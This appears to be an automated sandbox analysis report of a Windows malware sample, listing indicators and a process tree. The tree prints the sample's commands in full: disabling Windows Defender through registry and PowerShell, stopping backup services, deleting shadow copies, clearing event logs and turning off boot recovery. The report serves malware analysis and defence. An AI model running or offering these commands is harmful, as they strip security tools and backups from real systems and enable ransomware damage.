SeIncreaseQuotaPrivilege 2712 wmic.exe Token: SeSecurityPrivilege 2712 wmic.exe Token: SeTakeOwnershipPrivilege 2712 wmic.exe Token: SeLoadDriverPrivilege 2712 wmic.exe Token: SeSystemProfilePrivilege 2712 wmic.exe Token: SeSystemtimePrivilege 2712 wmic.exe Token: SeProfSingleProcessPrivilege 2712 wmic.exe Token: SeIncBasePriorityPrivilege 2712 wmic.exe Token: SeCreatePagefilePrivilege 2712 wmic.exe Token: SeBackupPrivilege 2712 wmic.exe Token: SeRestorePrivilege 2712 wmic.exe Token: SeShutdownPrivilege 2712 wmic.exe Token: SeDebugPrivilege 2712 wmic.exe Token: SeSystemEnvironmentPrivilege 2712 wmic.exe Token: SeRemoteShutdownPrivilege 2712 wmic.exe Token: SeUndockPrivilege 2712 wmic.exe Token: SeManageVolumePrivilege 2712 wmic.exe Token: 33 2712 wmic.exe Token: 34 2712 wmic.exe Token: 35 2712 wmic.exe Token: 36 2712 wmic.exe Token: SeIncreaseQuotaPrivilege 2712 wmic.exe Token: SeSecurityPrivilege 2712 wmic.exe Token: SeTakeOwnershipPrivilege 2712 wmic.exe Token: SeLoadDriverPrivilege 2712 wmic.exe Token: SeSystemProfilePrivilege 2712 wmic.exe Token: SeSystemtimePrivilege 2712 wmic.exe Token: SeProfSingleProcessPrivilege 2712 wmic.exe Token: SeIncBasePriorityPrivilege 2712 wmic.exe Token: SeCreatePagefilePrivilege 2712 wmic.exe Token: SeBackupPrivilege 2712 wmic.exe Token: SeRestorePrivilege 2712 wmic.exe Token: SeShutdownPrivilege 2712 wmic.exe Token: SeDebugPrivilege 2712 wmic.exe Token: SeSystemEnvironmentPrivilege 2712 wmic.exe Token: SeRemoteShutdownPrivilege 2712 wmic.exe Token: SeUndockPrivilege 2712 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exechrome.exepid process 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 964 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exechrome.exepid process 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe 964 taskmgr.exe 3888 chrome.exe 3888 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
SystemSettings.exeLogonUI.exepid process 3992 SystemSettings.exe 2964 LogonUI.exe 2964 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3780 wrote to memory of 2256 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 2256 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 2256 wrote to memory of 3488 2256 net.exe net1.exe PID 2256 wrote to memory of 3488 2256 net.exe net1.exe PID 3780 wrote to memory of 912 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 912 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 912 wrote to memory of 3140 912 net.exe net1.exe PID 912 wrote to memory of 3140 912 net.exe net1.exe PID 3780 wrote to memory of 3860 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 3860 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3860 wrote to memory of 3444 3860 net.exe net1.exe PID 3860 wrote to memory of 3444 3860 net.exe net1.exe PID 3780 wrote to memory of 3532 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 3532 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3532 wrote to memory of 2848 3532 net.exe net1.exe PID 3532 wrote to memory of 2848 3532 net.exe net1.exe PID 3780 wrote to memory of 1456 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 1456 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 1456 wrote to memory of 1420 1456 net.exe net1.exe PID 1456 wrote to memory of 1420 1456 net.exe net1.exe PID 3780 wrote to memory of 2900 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 2900 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 2900 wrote to memory of 2116 2900 net.exe net1.exe PID 2900 wrote to memory of 2116 2900 net.exe net1.exe PID 3780 wrote to memory of 704 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 704 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 704 wrote to memory of 3232 704 net.exe net1.exe PID 704 wrote to memory of 3232 704 net.exe net1.exe PID 3780 wrote to memory of 1348 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 1348 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 1348 wrote to memory of 1196 1348 net.exe net1.exe PID 1348 wrote to memory of 1196 1348 net.exe net1.exe PID 3780 wrote to memory of 1428 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 3780 wrote to memory of 1428 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe net.exe PID 1428 wrote to memory of 1856 1428 net.exe net1.exe PID 1428 wrote to memory of 1856 1428 net.exe net1.exe PID 3780 wrote to memory of 2244 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 2244 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1384 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1384 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1532 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1532 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1836 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 1836 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3588 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3588 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 2024 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 2024 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3040 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3040 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 2484 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 2484 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3320 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3320 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe sc.exe PID 3780 wrote to memory of 3808 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 3808 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 2808 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 2808 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 1048 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 1048 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 1676 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 1676 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 956 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe PID 3780 wrote to memory of 956 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3488
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3140
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3444
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2848
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1420
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2116
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3232
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1196
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1350b" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1350b" /y3⤵PID:1856
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2244
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1384
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1532
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1836
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3588
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2024
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:3040
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2484
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1350b" start= disabled2⤵PID:3320
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3808
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2808
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1048
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1676
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:956
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3512
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2176
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1296
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3828
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2868
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2092
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1204
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3364
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3264
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1556
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1096
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1056
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1268
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1100
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1856
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1604
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1608
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2020
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2084 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3228 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3028 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4052
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1448
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:8
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3608
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2204 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3932
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2008 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3816 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:648 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1480 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1800 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3212
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3888 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3560 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3888 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff96ef34f50,0x7ff96ef34f60,0x7ff96ef34f702⤵PID:2316
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:22⤵PID:3440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2348 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:82⤵PID:3532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵PID:1384
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:12⤵PID:2244
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:12⤵PID:1188
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3992
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:2348
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:928
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:2956
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a89055 /state1:0x41c64e6d1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2964
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
d4238b7043cfe607fce1f0452336e06a
SHA18add55b7e540ffdb705fc577de15a9d7820e5b5a
SHA2562226becc8623691d75ff4f9085951af7402174717b4a58a5cd8ce5bd534c5d97
SHA512adaa3f99986f128a91fa7a5b46646e6db0c8f3f2d5f5c2783258a0c16f6c3bf5a833a1802e7f532cf64a6b68ee85cf8ad42808a846d220d4f2a5b6a2dcdc9562
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e